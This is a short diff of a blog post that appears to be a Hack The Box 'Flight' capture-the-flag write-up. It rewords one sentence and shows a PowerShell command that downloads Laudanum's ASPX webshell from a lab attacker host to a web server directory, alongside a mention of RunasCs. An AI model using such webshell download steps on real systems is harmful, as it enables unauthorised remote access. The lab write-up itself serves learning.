duskb1t/duskb1t.github.io/_posts/flight/2024-05-08-htb-flight.md

                        CREATOR OWNER:(I)(OI)(CI)(IO)(F)
 ```

-However, C.Bum does not have PS Remote permissions and we don’t have a GUI but what we have are his credentials.
+However, C.Bum does not have PS Remote access and we don’t have a GUI but what we have are his credentials.
 Uploaded [RunasCs](https://github.com/antonioCoco/RunasCs) and [Laudanum’s ASPX webshell](https://github.com/jbarcia/Web-Shells/blob/master/laudanum/aspx/shell.aspx).

 ```
 PS C:\inetpub> iwr -uri http://10.10.14.112/shell.aspx -outfile c:\users\public\shell.aspx